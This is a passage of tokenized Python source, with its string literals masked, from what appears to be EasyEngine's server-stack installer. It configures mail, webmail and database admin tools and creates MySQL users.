( self , "<STR_LIT>" , <NUM_LIT> ) <EOL> EEGit . 
add ( self , [ "<STR_LIT>" ] , msg = "<STR_LIT>" ) <EOL> EEService . reload_service ( self , '<STR_LIT>' ) <EOL> if set ( EEVariables . ee_mail ) . issubset ( set ( apt_packages ) ) : <EOL> Log . debug ( self , "<STR_LIT>" ) <EOL> try : <EOL> EEShellExec . cmd_exec ( self , "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> except CommandExecutionError as e : <EOL> Log . error ( self , "<STR_LIT>" ) <EOL> try : <EOL> EEShellExec . cmd_exec ( self , "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> . format ( hostname = EEVariables . ee_fqdn , <EOL> email = EEVariables . ee_email ) ) <EOL> except CommandExecutionError as e : <EOL> Log . error ( self , "<STR_LIT>" ) <EOL> Log . debug ( self , "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> EEFileUtils . chmod ( self , "<STR_LIT>" , <NUM_LIT> ) <EOL> data = dict ( ) <EOL> Log . debug ( self , "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> ee_dovecot = open ( '<STR_LIT>' , <EOL> encoding = '<STR_LIT:utf-8>' , mode = '<STR_LIT:w>' ) <EOL> self . app . render ( ( data ) , '<STR_LIT>' , <EOL> out = ee_dovecot ) <EOL> ee_dovecot . close ( ) <EOL> data = dict ( email = EEVariables . ee_email ) <EOL> Log . debug ( self , "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> ee_dovecot = open ( '<STR_LIT>' , <EOL> encoding = '<STR_LIT:utf-8>' , mode = '<STR_LIT:w>' ) <EOL> self . app . render ( ( data ) , '<STR_LIT>' , out = ee_dovecot ) <EOL> ee_dovecot . close ( ) <EOL> try : <EOL> EEShellExec . cmd_exec ( self , "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> EEShellExec . cmd_exec ( self , "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> EEShellExec . cmd_exec ( self , "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> EEShellExec . cmd_exec ( self , "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> EEShellExec . 
cmd_exec ( self , "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> EEShellExec . cmd_exec ( self , "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> EEShellExec . cmd_exec ( self , "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> EEShellExec . cmd_exec ( self , "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> EEShellExec . cmd_exec ( self , "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> EEShellExec . cmd_exec ( self , "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> EEShellExec . cmd_exec ( self , "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> EEShellExec . cmd_exec ( self , "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> EEShellExec . cmd_exec ( self , "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> EEShellExec . cmd_exec ( self , "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> EEShellExec . cmd_exec ( self , "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> EEShellExec . cmd_exec ( self , "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> EEShellExec . cmd_exec ( self , "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> EEShellExec . cmd_exec ( self , "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> EEShellExec . cmd_exec ( self , "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> EEShellExec . cmd_exec ( self , "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> EEShellExec . cmd_exec ( self , "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> . format ( hostname = EEVariables . ee_fqdn , <EOL> email = EEVariables . ee_email ) ) <EOL> EEShellExec . cmd_exec ( self , "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> EEShellExec . cmd_exec ( self , "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> EEShellExec . cmd_exec ( self , "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> except CommandExecutionError as e : <EOL> Log . Error ( self , "<STR_LIT>" ) <EOL> if not os . path . exists ( '<STR_LIT>' ) : <EOL> Log . debug ( self , '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> os . 
makedirs ( '<STR_LIT>' ) <EOL> data = dict ( ) <EOL> Log . debug ( self , "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> ee_sieve = open ( '<STR_LIT>' , <EOL> encoding = '<STR_LIT:utf-8>' , mode = '<STR_LIT:w>' ) <EOL> self . app . render ( ( data ) , '<STR_LIT>' , <EOL> out = ee_sieve ) <EOL> ee_sieve . close ( ) <EOL> Log . debug ( self , "<STR_LIT>" ) <EOL> EEFileUtils . chown ( self , "<STR_LIT>" , '<STR_LIT>' , '<STR_LIT>' , <EOL> recursive = True ) <EOL> try : <EOL> EEShellExec . cmd_exec ( self , "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> except CommandExecutionError as e : <EOL> raise SiteError ( "<STR_LIT>" ) <EOL> EEGit . add ( self , [ "<STR_LIT>" , "<STR_LIT>" ] , <EOL> msg = "<STR_LIT>" ) <EOL> EEService . restart_service ( self , '<STR_LIT>' ) <EOL> EEService . reload_service ( self , '<STR_LIT>' ) <EOL> if set ( EEVariables . ee_mailscanner ) . issubset ( set ( apt_packages ) ) : <EOL> data = dict ( ) <EOL> Log . debug ( self , "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> ee_amavis = open ( '<STR_LIT>' , <EOL> encoding = '<STR_LIT:utf-8>' , mode = '<STR_LIT:w>' ) <EOL> self . app . render ( ( data ) , '<STR_LIT>' , <EOL> out = ee_amavis ) <EOL> ee_amavis . close ( ) <EOL> if os . path . isfile ( "<STR_LIT>" ) : <EOL> vm_host = os . popen ( "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) . read ( ) <EOL> vm_pass = os . popen ( "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) . read ( ) <EOL> data = dict ( host = vm_host , password = vm_pass ) <EOL> vm_config = open ( '<STR_LIT>' , <EOL> encoding = '<STR_LIT:utf-8>' , mode = '<STR_LIT:w>' ) <EOL> self . app . render ( ( data ) , '<STR_LIT>' , out = vm_config ) <EOL> vm_config . close ( ) <EOL> try : <EOL> EEShellExec . cmd_exec ( self , "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> EEShellExec . 
cmd_exec ( self , "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> except CommandExecutionError as e : <EOL> raise SiteError ( "<STR_LIT>" ) <EOL> amavis_master = ( """<STR_LIT>""" ) <EOL> with open ( "<STR_LIT>" , <EOL> encoding = '<STR_LIT:utf-8>' , mode = '<STR_LIT:a>' ) as am_config : <EOL> am_config . write ( amavis_master ) <EOL> try : <EOL> Log . debug ( self , "<STR_LIT>" ) <EOL> EEShellExec . cmd_exec ( self , "<STR_LIT>" ) <EOL> Log . debug ( self , "<STR_LIT>" ) <EOL> EEShellExec . cmd_exec ( self , "<STR_LIT>" ) <EOL> Log . debug ( self , "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> EEFileUtils . chmod ( self , "<STR_LIT>" , <NUM_LIT> ) <EOL> Log . debug ( self , "<STR_LIT>" ) <EOL> EEShellExec . cmd_exec ( self , "<STR_LIT>" ) <EOL> except CommandExecutionError as e : <EOL> raise SiteError ( "<STR_LIT>" ) <EOL> EEGit . add ( self , [ "<STR_LIT>" ] , msg = "<STR_LIT>" ) <EOL> EEService . restart_service ( self , '<STR_LIT>' ) <EOL> EEService . reload_service ( self , '<STR_LIT>' ) <EOL> EEService . restart_service ( self , '<STR_LIT>' ) <EOL> if len ( packages ) : <EOL> if any ( '<STR_LIT>' == x [ <NUM_LIT:1> ] for x in packages ) : <EOL> Log . debug ( self , "<STR_LIT>" ) <EOL> EEFileUtils . chmod ( self , "<STR_LIT>" , <NUM_LIT> ) <EOL> if any ( '<STR_LIT>' == x [ <NUM_LIT:1> ] <EOL> for x in packages ) : <EOL> EEExtract . extract ( self , '<STR_LIT>' , '<STR_LIT>' ) <EOL> Log . debug ( self , '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> if not os . path . exists ( '<STR_LIT>' <EOL> . format ( EEVariables . ee_webroot ) ) : <EOL> Log . debug ( self , "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> . format ( EEVariables . ee_webroot ) ) <EOL> os . makedirs ( '<STR_LIT>' <EOL> . format ( EEVariables . ee_webroot ) ) <EOL> shutil . move ( '<STR_LIT>' , <EOL> '<STR_LIT>' <EOL> . format ( EEVariables . ee_webroot ) ) <EOL> shutil . copyfile ( '<STR_LIT>' <EOL> . format ( EEVariables . 
ee_webroot ) , <EOL> '<STR_LIT>' <EOL> . format ( EEVariables . ee_webroot ) ) <EOL> Log . debug ( self , '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> . format ( EEVariables . ee_webroot ) ) <EOL> blowfish_key = '<STR_LIT>' . join ( [ random . choice <EOL> ( string . ascii_letters + string . digits ) <EOL> for n in range ( <NUM_LIT:10> ) ] ) <EOL> EEFileUtils . searchreplace ( self , <EOL> '<STR_LIT>' <EOL> . format ( EEVariables . ee_webroot ) , <EOL> "<STR_LIT>" , "<STR_LIT>" <EOL> . format ( blowfish_key ) ) <EOL> Log . debug ( self , '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> . format ( EEVariables . ee_webroot ) ) <EOL> EEFileUtils . searchreplace ( self , <EOL> '<STR_LIT>' <EOL> . format ( EEVariables . ee_webroot ) , <EOL> "<STR_LIT>" , "<STR_LIT>" <EOL> . format ( EEVariables . ee_mysql_host ) ) <EOL> Log . debug ( self , '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> . format ( EEVariables . ee_webroot ) ) <EOL> EEFileUtils . chown ( self , '<STR_LIT>' <EOL> . format ( EEVariables . ee_webroot ) , <EOL> EEVariables . ee_php_user , <EOL> EEVariables . ee_php_user , <EOL> recursive = True ) <EOL> if any ( '<STR_LIT>' == x [ <NUM_LIT:1> ] <EOL> for x in packages ) : <EOL> Log . debug ( self , "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> . format ( EEVariables . ee_webroot ) ) <EOL> EEExtract . extract ( self , '<STR_LIT>' , <EOL> '<STR_LIT>' <EOL> . format ( EEVariables . ee_webroot ) ) <EOL> Log . debug ( self , "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> . format ( EEVariables . ee_webroot ) ) <EOL> EEFileUtils . chown ( self , '<STR_LIT>' <EOL> . format ( EEVariables . ee_webroot ) , <EOL> EEVariables . ee_php_user , <EOL> EEVariables . ee_php_user , <EOL> recursive = True ) <EOL> if any ( '<STR_LIT>' == x [ <NUM_LIT:1> ] <EOL> for x in packages ) : <EOL> Log . debug ( self , "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> EEExtract . extract ( self , '<STR_LIT>' , '<STR_LIT>' ) <EOL> if not os . path . exists ( '<STR_LIT>' <EOL> . format ( EEVariables . ee_webroot ) ) : <EOL> Log . 
debug ( self , "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> . format ( EEVariables . ee_webroot ) ) <EOL> os . makedirs ( '<STR_LIT>' <EOL> . format ( EEVariables . ee_webroot ) ) <EOL> shutil . move ( '<STR_LIT>' , <EOL> '<STR_LIT>' <EOL> . format ( EEVariables . ee_webroot ) ) <EOL> EEFileUtils . searchreplace ( self , "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> . format ( EEVariables . ee_webroot ) , <EOL> "<STR_LIT>" , "<STR_LIT>" ) <EOL> EEFileUtils . searchreplace ( self , "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> . format ( EEVariables . ee_webroot ) , <EOL> "<STR_LIT>" , <EOL> EEVariables . ee_timezone ) <EOL> EEFileUtils . searchreplace ( self , "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> . format ( EEVariables . ee_webroot ) , <EOL> "<STR_LIT>" , "<STR_LIT:100>" ) <EOL> Log . debug ( self , "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> . format ( EEVariables . ee_webroot ) ) <EOL> EEFileUtils . chown ( self , '<STR_LIT>' <EOL> . format ( EEVariables . ee_webroot ) , <EOL> EEVariables . ee_php_user , <EOL> EEVariables . ee_php_user , <EOL> recursive = True ) <EOL> if any ( '<STR_LIT>' == x [ <NUM_LIT:1> ] <EOL> for x in packages ) : <EOL> Log . debug ( self , "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> EEExtract . extract ( self , '<STR_LIT>' , '<STR_LIT>' ) <EOL> if not os . path . exists ( '<STR_LIT>' <EOL> . format ( EEVariables . ee_webroot ) ) : <EOL> Log . debug ( self , "<STR_LIT>" ) <EOL> os . makedirs ( '<STR_LIT>' <EOL> . format ( EEVariables . ee_webroot ) ) <EOL> shutil . move ( '<STR_LIT>' , <EOL> '<STR_LIT>' <EOL> . format ( EEVariables . ee_webroot ) ) <EOL> chars = '<STR_LIT>' . join ( random . sample ( string . ascii_letters , <NUM_LIT:8> ) ) <EOL> try : <EOL> EEShellExec . cmd_exec ( self , '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> . format ( EEVariables . ee_webroot ) ) <EOL> except CommandExecutionError as e : <EOL> raise SiteError ( "<STR_LIT>" ) <EOL> EEMysql . execute ( self , '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' . format ( self . app . config . 
get ( '<STR_LIT>' , <EOL> '<STR_LIT>' ) , chars ) ) <EOL> Log . debug ( self , "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> EEMysql . execute ( self , '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' . format ( self . app . config . get ( <EOL> '<STR_LIT>' , '<STR_LIT>' ) , <EOL> chars ) , <EOL> errormsg = "<STR_LIT>" , log = False ) <EOL> Log . debug ( self , "<STR_LIT>" ) <EOL> data = dict ( host = EEVariables . ee_mysql_host , port = '<STR_LIT>' , <EOL> user = '<STR_LIT>' , password = chars ) <EOL> ee_anemometer = open ( '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> . format ( EEVariables . ee_webroot ) , <EOL> encoding = '<STR_LIT:utf-8>' , mode = '<STR_LIT:w>' ) <EOL> self . app . render ( ( data ) , '<STR_LIT>' , <EOL> out = ee_anemometer ) <EOL> ee_anemometer . close ( ) <EOL> if any ( '<STR_LIT>' == x [ <NUM_LIT:1> ] <EOL> for x in packages ) : <EOL> EEFileUtils . chmod ( self , "<STR_LIT>" , <NUM_LIT> ) <EOL> if any ( '<STR_LIT>' == x [ <NUM_LIT:1> ] for x in packages ) : <EOL> Log . debug ( self , "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> EEExtract . extract ( self , '<STR_LIT>' , '<STR_LIT>' ) <EOL> if not os . path . exists ( '<STR_LIT>' <EOL> . format ( EEVariables . ee_webroot ) ) : <EOL> Log . debug ( self , "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> . format ( EEVariables . ee_webroot ) ) <EOL> os . makedirs ( '<STR_LIT>' <EOL> . format ( EEVariables . ee_webroot ) ) <EOL> shutil . move ( '<STR_LIT>' <EOL> . format ( EEVariables . ee_vimbadmin ) , <EOL> '<STR_LIT>' <EOL> . format ( EEVariables . ee_webroot ) ) <EOL> Log . debug ( self , "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> try : <EOL> EEShellExec . cmd_exec ( self , "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" . format ( EEVariables . ee_webroot ) ) <EOL> Log . debug ( self , "<STR_LIT>" ) <EOL> EEShellExec . cmd_exec ( self , "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> . format ( EEVariables . 
ee_webroot , <EOL> EEVariables . ee_webroot ) ) <EOL> except CommandExecutionError as e : <EOL> raise SiteError ( "<STR_LIT>" ) <EOL> vm_passwd = '<STR_LIT>' . join ( random . sample ( string . ascii_letters , <NUM_LIT:8> ) ) <EOL> Log . debug ( self , "<STR_LIT>" ) <EOL> EEMysql . execute ( self , "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> Log . debug ( self , "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" . format ( self . app . config . get ( '<STR_LIT>' , <EOL> '<STR_LIT>' ) ) ) <EOL> EEMysql . execute ( self , "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" . format ( self . app . config . get ( '<STR_LIT>' , <EOL> '<STR_LIT>' ) , vm_passwd ) , <EOL> errormsg = "<STR_LIT>" <EOL> "<STR_LIT>" , log = False ) <EOL> vm_salt = ( '<STR_LIT>' . join ( random . sample ( string . ascii_letters + <EOL> string . ascii_letters , <NUM_LIT:64> ) ) ) <EOL> data = dict ( salt = vm_salt , host = EEVariables . ee_mysql_host , <EOL> password = vm_passwd , <EOL> php_user = EEVariables . ee_php_user ) <EOL> Log . debug ( self , '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> . format ( EEVariables . ee_webroot ) ) <EOL> ee_vmb = open ( '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> . format ( EEVariables . ee_webroot ) , <EOL> encoding = '<STR_LIT:utf-8>' , mode = '<STR_LIT:w>' ) <EOL> self . app . render ( ( data ) , '<STR_LIT>' , <EOL> out = ee_vmb ) <EOL> ee_vmb . close ( ) <EOL> shutil . copyfile ( "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> . format ( EEVariables . ee_webroot ) , <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" . format ( EEVariables . ee_webroot ) ) <EOL> Log . debug ( self , "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" . format ( EEVariables . ee_webroot ) ) <EOL> try : <EOL> EEShellExec . cmd_exec ( self , "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> . format ( EEVariables . ee_webroot ) ) <EOL> except CommandExecutionError as e : <EOL> raise SiteError ( "<STR_LIT>" ) <EOL> EEFileUtils . chown ( self , '<STR_LIT>' <EOL> . format ( EEVariables . 
ee_webroot ) , <EOL> EEVariables . ee_php_user , <EOL> EEVariables . ee_php_user , <EOL> recursive = True ) <EOL> if not os . path . exists ( '<STR_LIT>' ) : <EOL> Log . debug ( self , "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> os . makedirs ( '<STR_LIT>' ) <EOL> if EEVariables . ee_mysql_host is "<STR_LIT:localhost>" : <EOL> data = dict ( password = vm_passwd , host = "<STR_LIT:127.0.0.1>" ) <EOL> else : <EOL> data = dict ( password = vm_passwd , <EOL> host = EEVariables . ee_mysql_host ) <EOL> vm_config = open ( '<STR_LIT>' , <EOL> encoding = '<STR_LIT:utf-8>' , mode = '<STR_LIT:w>' ) <EOL> self . app . render ( ( data ) , '<STR_LIT>' , <EOL> out = vm_config ) <EOL> vm_config . close ( ) <EOL> Log . debug ( self , "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> vm_config = open ( '<STR_LIT>' , <EOL> encoding = '<STR_LIT:utf-8>' , mode = '<STR_LIT:w>' ) <EOL> self . app . render ( ( data ) , '<STR_LIT>' , <EOL> out = vm_config ) <EOL> vm_config . close ( ) <EOL> Log . debug ( self , "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> vm_config = open ( '<STR_LIT>' , <EOL> encoding = '<STR_LIT:utf-8>' , mode = '<STR_LIT:w>' ) <EOL> self . app . render ( ( data ) , '<STR_LIT>' , <EOL> out = vm_config ) <EOL> vm_config . close ( ) <EOL> Log . debug ( self , "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> vm_config = open ( '<STR_LIT>' , <EOL> encoding = '<STR_LIT:utf-8>' , mode = '<STR_LIT:w>' ) <EOL> self . app . render ( ( data ) , '<STR_LIT>' , <EOL> out = vm_config ) <EOL> vm_config . close ( ) <EOL> if set ( EEVariables . ee_mailscanner ) . issubset ( set ( apt_packages ) ) : <EOL> vm_config = open ( '<STR_LIT>' , <EOL> encoding = '<STR_LIT:utf-8>' , mode = '<STR_LIT:w>' ) <EOL> self . app . render ( ( data ) , '<STR_LIT>' , <EOL> out = vm_config ) <EOL> vm_config . close ( ) <EOL> EEService . restart_service ( self , '<STR_LIT>' ) <EOL> EEService . reload_service ( self , '<STR_LIT>' ) <EOL> if EEVariables . ee_platform_codename != '<STR_LIT>' : <EOL> EEService . 
reload_service ( self , '<STR_LIT>' ) <EOL> else : <EOL> EEService . reload_service ( self , '<STR_LIT>' ) <EOL> if EEAptGet . is_installed ( self , '<STR_LIT>' ) : <EOL> EEService . reload_service ( self , '<STR_LIT>' ) <EOL> self . msg = ( self . msg + [ "<STR_LIT>" <EOL> "<STR_LIT>" . format ( EEVariables . ee_fqdn ) ] <EOL> + [ "<STR_LIT>" . format ( vm_salt ) ] ) <EOL> if any ( '<STR_LIT>' == x [ <NUM_LIT:1> ] for x in packages ) : <EOL> Log . debug ( self , "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> EEExtract . extract ( self , '<STR_LIT>' , '<STR_LIT>' ) <EOL> if not os . path . exists ( '<STR_LIT>' <EOL> . format ( EEVariables . ee_webroot ) ) : <EOL> Log . debug ( self , "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> . format ( EEVariables . ee_webroot ) ) <EOL> os . makedirs ( '<STR_LIT>' <EOL> . format ( EEVariables . ee_webroot ) ) <EOL> shutil . move ( '<STR_LIT>' <EOL> . format ( EEVariables . ee_roundcube ) , <EOL> '<STR_LIT>' <EOL> . format ( EEVariables . ee_webroot ) ) <EOL> if EEVariables . ee_platform_codename == '<STR_LIT>' : <EOL> EEShellExec . cmd_exec ( self , "<STR_LIT>" ) <EOL> EEShellExec . cmd_exec ( self , "<STR_LIT>" ) <EOL> EEShellExec . cmd_exec ( self , "<STR_LIT>" ) <EOL> EEShellExec . cmd_exec ( self , "<STR_LIT>" ) <EOL> EEShellExec . cmd_exec ( self , "<STR_LIT>" ) <EOL> EEShellExec . cmd_exec ( self , "<STR_LIT>" ) <EOL> EEShellExec . cmd_exec ( self , "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> rc_passwd = '<STR_LIT>' . join ( random . sample ( string . ascii_letters , <NUM_LIT:8> ) ) <EOL> Log . debug ( self , "<STR_LIT>" ) <EOL> EEMysql . execute ( self , "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> Log . debug ( self , "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" . format ( self . app . config . get ( <EOL> '<STR_LIT>' , '<STR_LIT>' ) ) ) <EOL> EEMysql . execute ( self , "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" . format ( self . app . config . 
get ( <EOL> '<STR_LIT>' , '<STR_LIT>' ) , <EOL> rc_passwd ) ) <EOL> EEShellExec . cmd_exec ( self , "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> . format ( EEVariables . ee_webroot ) ) <EOL> shutil . copyfile ( "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> . format ( EEVariables . ee_webroot ) , <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> . format ( EEVariables . ee_webroot ) ) <EOL> EEShellExec . cmd_exec ( self , "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> . format ( rc_passwd , <EOL> EEVariables . ee_mysql_host , <EOL> EEVariables . ee_webroot ) ) <EOL> EEShellExec . cmd_exec ( self , "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> . format ( EEVariables . ee_webroot ) <EOL> + "<STR_LIT>" ) <EOL> EEShellExec . cmd_exec ( self , "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> . format ( EEVariables . ee_webroot ) <EOL> + "<STR_LIT>" ) <EOL> data = dict ( site_name = '<STR_LIT>' , www_domain = '<STR_LIT>' , <EOL> static = False , <EOL> basic = True , wp = False , w3tc = False , wpfc = False , <EOL> wpsc = False , multisite = False , wpsubdir = False , <EOL> webroot = EEVariables . ee_webroot , ee_db_name = '<STR_LIT>' , <EOL> ee_db_user = '<STR_LIT>' , ee_db_pass = '<STR_LIT>' , ee_db_host = '<STR_LIT>' , <EOL> rc = True ) <EOL> Log . debug ( self , '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> ee_rc = open ( '<STR_LIT>' , <EOL> encoding = '<STR_LIT:utf-8>' , mode = '<STR_LIT:w>' ) <EOL> self . app . render ( ( data ) , '<STR_LIT>' , <EOL> out = ee_rc ) <EOL> ee_rc . close ( ) <EOL> EEFileUtils . create_symlink ( self , [ '<STR_LIT>' <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' ] ) <EOL> if not os . path . exists ( '<STR_LIT>' <EOL> . format ( EEVariables . ee_webroot ) ) : <EOL> os . makedirs ( '<STR_LIT>' <EOL> . format ( EEVariables . ee_webroot ) ) <EOL> EEFileUtils . create_symlink ( self , [ '<STR_LIT>' <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> . 
format ( EEVariables . ee_webroot ) ] ) <EOL> EEFileUtils . create_symlink ( self , [ '<STR_LIT>' <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> . format ( EEVariables . ee_webroot ) ] ) <EOL> EEService . reload_service ( self , '<STR_LIT>' ) <EOL> EEFileUtils . remove ( self , [ "<STR_LIT>" <EOL> . format ( EEVariables . ee_webroot ) ] ) <EOL> EEFileUtils . chown ( self , '<STR_LIT>' <EOL> . format ( EEVariables . ee_webroot ) , <EOL> EEVariables . ee_php_user , <EOL> EEVariables . ee_php_user , <EOL> recursive = True ) <EOL> if any ( '<STR_LIT>' == x [ <NUM_LIT:1> ] <EOL> for x in packages ) : <EOL> Log . debug ( self , '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> EEExtract . extract ( self , '<STR_LIT>' , '<STR_LIT>' ) <EOL> if not os . path . exists ( '<STR_LIT>' <EOL> . format ( EEVariables . ee_webroot ) ) : <EOL> Log . debug ( self , "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> . format ( EEVariables . ee_webroot ) ) <EOL> os . makedirs ( '<STR_LIT>' <EOL> . format ( EEVariables . ee_webroot ) ) <EOL> shutil . move ( '<STR_LIT>' , <EOL> '<STR_LIT>' <EOL> . format ( EEVariables . ee_webroot ) ) <EOL> Log . debug ( self , '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> EEExtract . extract ( self , '<STR_LIT>' , '<STR_LIT>' ) <EOL> shutil . move ( '<STR_LIT>' , <EOL> '<STR_LIT>' <EOL> . format ( EEVariables . ee_webroot ) ) <EOL> Log . debug ( self , '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> . format ( EEVariables . ee_webroot ) ) <EOL> EEFileUtils . chown ( self , '<STR_LIT>' <EOL> . format ( EEVariables . ee_webroot ) , <EOL> EEVariables . ee_php_user , <EOL> EEVariables . ee_php_user , <EOL> recursive = True ) <EOL> @ expose ( help = "<STR_LIT>" ) <EOL> def install ( self , packages = [ ] , apt_packages = [ ] , disp_msg = True ) : <EOL> """<STR_LIT>""" <EOL> self . msg = [ ] <EOL> try : <EOL> if ( ( not self . app . pargs . web ) and ( not self . app . pargs . admin ) and <EOL> ( not self . app . pargs . mail ) and ( not self . app . pargs . nginx ) and <EOL> ( not self . 
